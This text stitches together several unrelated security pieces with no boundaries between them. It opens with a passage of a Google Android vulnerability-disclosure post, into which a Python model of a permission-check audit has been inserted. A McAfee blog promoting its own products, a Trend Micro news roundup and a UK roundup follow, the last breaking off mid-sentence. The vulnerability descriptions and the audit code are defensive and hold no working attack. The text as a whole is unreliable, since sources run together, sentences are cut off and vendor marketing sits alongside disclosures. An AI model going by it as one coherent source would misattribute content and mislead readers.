The APVI covers Google-discovered issues that could potentially affect the security posture of an Android device or its user and is aligned to ISO/IEC 29147:2018 Information technology -- Security techniques -- Vulnerability disclosure recommendations. The initiative covers a wide range of issues impacting device code that is not serviced or maintained by Google (these are handled by the Android Security Bulletins).

Protecting Android users

The APVI has already processed a number of security issues, improving user protection against permissions bypasses, execution of code in the kernel, credential leaks and generation of unencrypted backups. Below are a few examples of what we’ve found, the impact and OEM remediation efforts.

Permission Bypass

In some versions of a third-party pre-installed over-the-air (OTA) update solution, a custom system service in the Android framework exposed privileged APIs directly to the OTA app. The service ran as the system user and did not require any permissions to access, instead checking for knowledge of a hardcoded password. The operations available varied across versions, but always allowed access to sensitive APIs, such as silently installing/uninstalling APKs, enabling/disabling apps and granting app permissions. This service appeared in the code base for many device builds across many OEMs, however it wasn’t always registered or exposed to apps. We’ve worked with impacted OEMs to make them aware of this security issue and provided guidance on how to remove or disable the affected code.

Credential Leak

A popular web browser pre-installed on many devices included a built-in password manager for sites visited by the user. The interface for this feature was exposed to WebView through JavaScript loaded in the context of each web page. A malicious site could have accessed the full contents of the user’s credential store. The credentials are encrypted at rest, but used a weak algorithm (DES) and a known, hardcoded key. This issue was reported to the developer and updates for the app were issued to users.

Overly-Privileged Apps

The checkUidPermission method in the PackageManagerService class was modified in the framework code for some devices to allow special permissions access to some apps. In one version, the method granted apps with the shared user ID com.google.uid.shared any permission they requested and apps signed with the same key as the com.google.android.gsf package any permission in their manifest. Another version of the modification allowed apps matching a list of package names and signatures to pass runtime permission checks even if the permission was not in their manifest. These issues have been fixed by the OEMs.
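Both modifications described above can be surfaced by differential testing: evaluate the device's permission check and a manifest-grounded reference policy over the same package table, and report every grant that only the device makes. The Python model below is an added example, not AOSP or OEM code; the package table, signer labels, allowlist and the reference policy are constructed, and it reads "any permission they requested" as any permission being checked.

```python
"""Differential audit of a modified permission check (constructed model)."""
from dataclasses import dataclass
from typing import Optional

GRANTED, DENIED = 0, -1  # same values as PackageManager.PERMISSION_GRANTED / PERMISSION_DENIED


@dataclass(frozen=True)
class Package:
    name: str
    uid: int
    signer: str                          # constructed label for the signing key
    shared_user_id: Optional[str] = None
    manifest: frozenset = frozenset()    # permissions declared in the manifest
    granted: frozenset = frozenset()     # permissions actually granted


def reference_check(pkgs, perm, uid):
    """Reference policy (an assumption of this model): a UID holds a permission
    only if one of its packages both declares it and has been granted it."""
    for p in pkgs:
        if p.uid == uid and perm in p.manifest and perm in p.granted:
            return GRANTED
    return DENIED


def modified_check_a(pkgs, perm, uid):
    """Model of the first modification described in the post."""
    gsf_signers = {p.signer for p in pkgs if p.name == "com.google.android.gsf"}
    for p in pkgs:
        if p.uid != uid:
            continue
        # Shared user ID shortcut: every checked permission is granted.
        if p.shared_user_id == "com.google.uid.shared":
            return GRANTED
        # Same signer as gsf: anything in the manifest, granted or not.
        if p.signer in gsf_signers and perm in p.manifest:
            return GRANTED
    return reference_check(pkgs, perm, uid)


def modified_check_b(pkgs, perm, uid, allowlist):
    """Model of the second modification: a (package name, signer) allowlist
    passes the check even when the permission is not in the manifest."""
    for p in pkgs:
        if p.uid == uid and (p.name, p.signer) in allowlist:
            return GRANTED
    return reference_check(pkgs, perm, uid)


def audit(pkgs, perms, check):
    """Return (uid, package names, permission) for every grant that `check`
    makes and the reference policy refuses."""
    findings = []
    for uid in sorted({p.uid for p in pkgs}):
        names = tuple(sorted(p.name for p in pkgs if p.uid == uid))
        for perm in sorted(perms):
            if (check(pkgs, perm, uid) == GRANTED
                    and reference_check(pkgs, perm, uid) == DENIED):
                findings.append((uid, names, perm))
    return findings


# Constructed test data. Only the gsf package name and the shared user ID
# string come from the post; everything else is made up for the example.
CAMERA = "android.permission.CAMERA"
INSTALL = "android.permission.INSTALL_PACKAGES"
CONTACTS = "android.permission.READ_CONTACTS"
PERMS = [CAMERA, INSTALL, CONTACTS]
PACKAGES = [
    Package("com.google.android.gsf", 10010, "key-gsf",
            manifest=frozenset({CONTACTS}), granted=frozenset({CONTACTS})),
    Package("com.example.oem.helper", 10011, "key-gsf",
            manifest=frozenset({INSTALL})),              # declared, never granted
    Package("com.example.shared.app", 10012, "key-other",
            shared_user_id="com.google.uid.shared"),     # declares nothing
    Package("com.example.allowlisted", 10013, "key-oem"),  # declares nothing
    Package("com.example.ordinary", 10014, "key-dev",
            manifest=frozenset({CAMERA}), granted=frozenset({CAMERA})),
]
ALLOWLIST = {("com.example.allowlisted", "key-oem")}


def check_b(pkgs, perm, uid):
    """modified_check_b bound to the constructed allowlist."""
    return modified_check_b(pkgs, perm, uid, ALLOWLIST)


if __name__ == "__main__":
    for label, check in (("A", modified_check_a), ("B", check_b)):
        for uid, names, perm in audit(PACKAGES, PERMS, check):
            print(f"modification {label}: uid {uid} {names} gains {perm}")
```

On a real build the same comparison would be driven by the device's actual answers rather than a model; a non-empty findings list is what a regression test should fail on.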

More information

Keep an eye out at https://bugs.chromium.org/p/apvi/ for future disclosures of Google-discovered security issues under this program, or find more information there on issues that have already been disclosed.

Acknowledgements: Scott Roberts, Shailesh Saini and Łukasz Siewierski, Android Security and Privacy Team

Convenience vs. Online Security: Have Your Cake and Eat It Too

We live in a world where convenience is king. Personally, I don’t know what I would do without my calendar alerts popping up on my smartphone, ensuring that I don’t miss any important meetings (or birthdays). I can also use a variety of apps to make appointments with my family’s doctor and check up on my kids’ educational progress while they are at home distance learning. While this technology is great and convenient, it has led to increased connectivity, which tends to have security implications. At what point do we draw the line between convenience and online security, and is there a way to ultimately have both? Let’s take a look.

Are Consumers Confident in Their Online Safety?

Consumers want to live their lives fast. They are constantly on the go, prioritizing speedy technology and convenience – sometimes more than safety. As a result, basic security hygiene, like updating passwords, has fallen by the wayside. In fact, a recent survey conducted by YouGov in April of 2020 revealed that consumers are overconfident in the level of protection that their credentials provide. 77% believe that their banking credentials are the most secure, followed by online shopping (74%), and work network logins (71%). Due to consumers’ overconfidence in the strength of their credentials, over half of online shoppers admitted that they have no plans to update their login details – and even more admitted to not updating bank and work passwords. As someone who just recently wrote a blog on common password habits and how they can affect our online safety,

Finding a Balance Between Convenience and Security

As today’s users are trying to grasp what the “new normal” means for them and how they live their lives, many are branching out from the typical ways they used to order food, take workout classes, and more. Consumers are using food delivery sites that they’ve never used before and signing up for online fitness classes on new platforms to  stay healthy while social distancing. But by using these unfamiliar websites to establish a sense of normalcy, users might forget to take basic security precautions like making sure these websites have the standard https:// security clearance or using a VPN. Paying attention to these security measures while exploring new platforms will allow users to enjoy the convenience of these tools without putting their online safety at risk.

According to McAfee Labs, more than 113,000 websites have been published that used COVID-19 to lure internet users into giving up their personal details. But despite the risks associated with poor security hygiene, consumers appear to be pretty indifferent. When asked if COVID-19 and increased fraud influenced them to use alternative banking or shopping apps/websites with more secure options, over three-quarters of U.S. consumers stated no, or that they didn’t know. At the onset of the pandemic when consumers were under pressure to buy scarce, staple items, 26% of consumers in the U.S. admitted to overlooking online security concerns by using third-party merchants to buy things like toilet paper and disinfecting products.

Today’s users already have so much to worry about – I can’t blame them if their online security is falling by the wayside to allow physical health and wellness to take precedence. It’s times like these, when people need to prioritize their health and basic survival above all else, that consumers benefit most from intrinsic security that is constantly working in the background, so they can have peace of mind.

Let Them Have Security (and Convenience!)

The good news: convenience and security don’t have to be mutually exclusive. I can still use my healthcare provider’s app to schedule appointments and check in on my kids as they distance learn without risking our family’s privacy. When it comes to balancing convenience and online security, you and your family should use trusted solutions that will allow you to enjoy all that the internet has to offer by providing security that is easy, convenient, and empowers you to enjoy a safe and private digital life.

Users can enjoy a comprehensive, yet holistic approach to protection by employing the help of a security solution like McAfee® Total Protection. Consumers are safeguarded from malware so they can continue to use their devices and web browsing to stream live workout classes, catch up with family over video conference, and more. The software’s detection capabilities are constantly being updated and enhanced without compromising users’ device performance.

McAfee Total Protection also includes McAfee® WebAdvisor – web protection that enables users to sidestep attacks before they happen with clear warnings of risky websites, links, and files. McAfee WebAdvisor allows consumers to shop online or order food from their favorite restaurant while giving them the peace of mind that they’re on a safe website.

McAfee Total Protection also includes our secure VPN to ensure your family is prepared for potential threats that could be lurking around the corner. By enabling a VPN on your device, you can feel confident that the next time you bank or pay bills online, your connection is secure. With solutions like McAfee Total Protection and McAfee WebAdvisor in place, consumers can strike a balance between convenience and security, without sacrificing either.


The post Convenience vs. Online Security: Have Your Cake and Eat It Too appeared first on McAfee Blogs.

This Week in Security News: Linkury Adware Caught Distributing Full-Blown Malware and Cross-Platform Modular Glupteba Malware Uses ManageX


Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how an adware family known primarily for distributing browser hijackers, Linkury, has been caught distributing malware. Also, read about a newly uncovered strain of the Glupteba trojan.


Read on:

Cross-Platform Modular Glupteba Malware Uses ManageX

Trend Micro recently encountered a variant of the Glupteba trojan and reported its attacks on MikroTik routers and updates on its command and control (C&C) servers. The use of ManageX, a type of modular adware that Trend Micro has recently analyzed, is notable in this newly uncovered strain as it aims to emphasize the modularity and the cross-platform features of Glupteba as seen through its code analysis.

Phishing Attack Targets Microsoft 365 Users with Netflix & Amazon Lures

Security researchers have been tracking a phishing campaign that abuses Microsoft Office 365 third-party application access to obtain specific resources from victims’ accounts. The attacker, dubbed TA2552, mostly uses Spanish-language lures and a narrow range of themes and brands. These attacks have targeted organizations with a global presence but seem to choose victims who likely speak Spanish, according to a report from Proofpoint researchers.

New Report Suggests the Bug Bounty Business is Recession-Proof

A new report from HackerOne presents data suggesting that the bug bounty business might be recession-proof, citing increases in hacker registrations, monthly vulnerability disclosures and payouts during a pandemic-induced economic downturn. Brian Gorenc, senior director of vulnerability research and director of Trend Micro’s Zero Day Initiative program, shared that he’s seen bug bounty activity increase with ZDI publishing 1,045 vulnerability advisories in all of 2019 and 1,235 already in 2020.

Identity Fraud: How to Protect Your Identity Data, Accounts and Money During the Coronavirus Crisis

We’ve all been spending more time online since the pandemic hit, and as a result we’re sharing more personal and financial information online with each other and with organizations. Unfortunately, as ever, there are bad guys around every digital corner looking for this. Personally identifiable information (PII) is the currency of internet crime, and cyber-criminals will do whatever they can to get it.

Linkury Adware Caught Distributing Full-Blown Malware

An adware family known primarily for distributing browser hijackers has been caught distributing malware, security researchers said at the Virus Bulletin 2020 security conference. Its main method of distribution is the SafeFinder widget, a browser extension ironically advertised as a way to perform safe searches on the internet. K7 researchers say that in recent cases they analyzed, the SafeFinder widget has now also begun installing full-blown malware, such as the Socelars and Kpot infostealer trojans.

Chinese APT Group Targets Media, Finance, and Electronics Sectors

Cybersecurity researchers have uncovered a new espionage campaign targeting media, construction, engineering, electronics, and finance sectors in Japan, Taiwan, the U.S. and China. Linking the attacks to Palmerworm (aka BlackTech), likely a China-based advanced persistent threat (APT), the first wave of activity associated with this campaign began last year in August 2019.

InterPlanetary Storm Botnet Infects 13K Mac, Android Devices

A new variant of the InterPlanetary Storm malware has been discovered, which comes with fresh detection-evasion tactics and now targets Mac and Android devices (in addition to Windows and Linux, which were targeted by previous variants of the malware). Researchers say the malware is building a botnet with a current estimated 13,500 infected machines across 84 countries worldwide – and that number continues to grow.

More Americans Share Social Security, Financial and Medical Information than Before the Pandemic

A new survey has shown that consumer willingness to share more sensitive data – social security numbers, financial information and medical information – is greater in 2020 than in both 2018 and 2019. According to the NYC-based scientific research foundation ARF’s (Advertising Research Foundation) third annual privacy study, contact tracing is considered a key weapon in the fight against COVID-19.

Do you feel like you are more willing to share sensitive information online since the pandemic began? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Linkury Adware Caught Distributing Full-Blown Malware and Cross-Platform Modular Glupteba Malware Uses ManageX appeared first on .

Cyber Security Roundup for October 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, September 2020.

COVID-19 wasn't the only virus seriously disrupting the start of the new UK academic year, with ransomware plaguing a number of universities and colleges in September. Newcastle University was reportedly hit by the 'DoppelPaymer' crime group, a group known for deploying malware to attack its victims, and behind the online leak of documents from Elon Musk's SpaceX and Tesla companies. The northeast university reported a personal data breach to the UK Information Commissioner's Office after its stolen files were posted online, along with a Twitter threat to release further confidential student and staff data if a ransom was not paid. In a statement, the university said "it will take several weeks" to address the issues, and that many IT services will not be operating during this period. That statement is the hallmark of recovery from a mass ransomware infection.

Doppelpaymer Ransom notice

On the back of the Newcastle University cyberattack, the UK National Cyber Security Centre (NCSC) issued a warning to all British universities and colleges about a spike in ransomware attacks targeting the British educational sector. NCSC's director of operations Paul Chichester said the agency had seen an increase in the "utterly reprehensible" attacks over the past 18 months and was concerned they would disrupt young people's education.  The NCSC's guidance for organisations on defending against ransomware attacks